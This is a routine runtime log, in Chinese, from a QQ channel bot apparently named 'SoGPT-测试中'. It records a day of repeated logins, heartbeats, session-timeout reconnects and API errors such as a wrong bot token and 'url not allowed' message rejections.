2022-12-08 14:29:10,335 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 14:29:10,460 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 14:29:10,461 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:17:18,117 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:17:18,355 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/users/@me, 错误代码: 401, 返回内容: {'message': 'wrong bot token', 'code': 11242}, trace_id:829d8c60d296a3edcfac3d776dbd8b47
|
||||
2022-12-08 16:18:59,759 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:19:00,266 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:19:00,267 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:19:00,268 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:19:00,268 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:19:00,412 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:19:00,522 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:19:00,522 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:20:14,446 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:20:15,035 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:20:15,036 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:20:15,037 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:20:15,037 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:20:15,232 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:20:15,320 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:20:15,321 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:42:06,957 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:42:07,468 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:42:07,469 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:42:07,469 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:42:07,470 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:42:07,672 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:42:07,862 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:42:07,863 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:45:44,758 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:45:45,439 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:45:45,440 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:45:45,441 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:45:45,441 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:45:45,751 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:45:45,858 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:45:45,859 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:47:16,567 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:47:17,008 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:47:17,009 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:47:17,009 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:47:17,010 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:47:17,187 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:47:17,284 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:47:17,285 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:48:39,358 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:48:45,366 [WARNING] (http.py:188)request 请求超时,请求连接: https://api.sgroup.qq.com/gateway/bot
|
||||
2022-12-08 16:48:53,301 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:48:53,789 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:48:53,790 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:48:53,791 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:48:53,791 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:48:53,969 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:48:54,062 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:48:54,063 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:49:26,466 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150805/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:b201dd7b37649dcf47b82d54c58bc5dd
|
||||
2022-12-08 16:51:59,155 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:51:59,728 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:51:59,729 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:51:59,730 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:51:59,730 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:51:59,887 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:52:00,022 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:52:00,023 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:52:28,760 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150805/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:e62b072c9f0184f6bf7dd03a00fc0ef3
|
||||
2022-12-08 16:53:53,370 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:53:53,890 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:53:53,891 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:53:53,892 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:53:53,892 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:53:54,101 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:53:54,194 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:53:54,195 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:54:26,287 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150805/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 16:55:01,062 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:55:01,601 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:55:01,601 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:55:01,602 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:55:01,603 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:55:01,742 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:55:01,816 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:55:01,817 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:00:29,939 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 17:00:30,583 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 17:00:30,584 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:00:30,585 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:00:30,585 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:00:30,839 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 17:00:30,943 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 17:00:30,944 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:00:53,548 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:2ea547d78364cea60583ed450e589a17
|
||||
2022-12-08 17:10:31,405 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 17:10:32,081 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 17:10:32,082 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:10:32,083 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:10:32,083 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:10:32,342 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 17:10:32,449 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 17:10:32,450 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:13:47,495 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 17:13:47,993 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 17:13:47,994 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:13:47,995 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:13:47,995 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:13:48,198 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 17:13:48,300 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 17:13:48,302 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:16:31,326 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 17:22:03,924 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 17:22:04,671 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 17:22:04,672 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:22:04,673 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:22:04,673 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:22:04,856 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 17:22:04,958 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 17:22:04,959 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:52:04,868 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 17:52:09,874 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:52:09,876 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:52:09,877 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:52:10,104 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 17:52:10,170 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 17:52:10,171 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:00:00,757 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:00:01,443 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:00:01,443 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:00:01,444 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:00:01,445 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:00:01,602 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:00:01,823 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:00:01,824 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:03:13,211 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:03:14,082 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:03:14,084 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:03:14,084 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:03:14,085 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:03:14,289 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:03:14,498 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:03:14,499 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:16:29,246 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:16:30,054 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:16:30,055 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:16:30,056 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:16:30,056 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:16:30,293 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:16:30,424 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:16:30,424 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:16:41,898 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:3cc9fc95ac27cbbc1f1667f1aa11bf8d
|
||||
2022-12-08 18:18:16,615 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:18:17,399 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:18:17,400 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:18:17,400 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:18:17,401 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:18:17,606 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:18:17,731 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:18:17,732 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:19:07,357 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:19:07,941 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:19:07,942 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:19:07,942 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:19:07,943 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:19:08,247 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:19:08,335 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:19:08,336 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:20:46,416 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:20:47,023 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:20:47,023 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:20:47,024 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:20:47,025 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:20:47,475 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:20:47,640 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:20:47,641 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:21:24,437 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:21:24,991 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:21:24,992 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:21:24,993 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:21:24,993 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:21:25,165 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:21:25,265 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:21:25,266 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:24:18,469 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:24:19,076 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:24:19,077 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:24:19,077 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:24:19,078 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:24:19,252 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:24:19,339 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:24:19,341 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:27:13,898 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:27:14,553 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:27:14,554 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:27:14,554 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:27:14,555 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:27:14,747 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:27:14,850 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:27:14,851 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:30:47,647 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:30:48,327 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:30:48,328 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:30:48,329 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:30:48,330 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:30:48,736 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:30:48,873 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:30:48,874 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:31:57,250 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:31:57,955 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:31:57,956 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:31:57,957 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:31:57,957 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:31:58,165 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:31:58,269 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:31:58,270 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 19:01:58,099 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 19:02:03,110 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 19:02:03,111 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 19:02:03,111 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 19:02:03,314 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 19:02:03,381 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 19:02:03,382 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 19:32:03,274 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 19:32:08,271 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 19:32:08,272 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 19:32:08,272 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 19:32:08,534 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 19:32:08,604 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 19:32:08,605 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:02:08,495 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 20:02:13,497 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 20:02:13,497 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 20:02:13,498 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 20:02:13,797 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 20:02:13,914 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 20:02:13,915 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:31:53,159 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 20:31:58,306 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 20:31:58,307 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 20:31:58,308 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 20:31:58,308 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 20:31:58,748 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 20:31:58,924 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 20:31:58,925 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:34:26,596 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 20:34:27,610 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 20:34:27,611 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 20:34:27,613 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 20:34:27,613 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 20:34:27,919 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 20:34:28,022 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 20:34:28,023 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:35:47,952 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 20:35:48,499 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 20:35:48,500 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 20:35:48,500 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 20:35:48,501 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 20:35:48,723 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 20:35:48,793 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 20:35:48,794 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:55:03,450 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:c4c4d23f9b2829d03ae9a7dca0184fe9
|
||||
2022-12-08 21:05:48,678 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 21:05:53,700 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:05:53,701 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:05:53,702 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
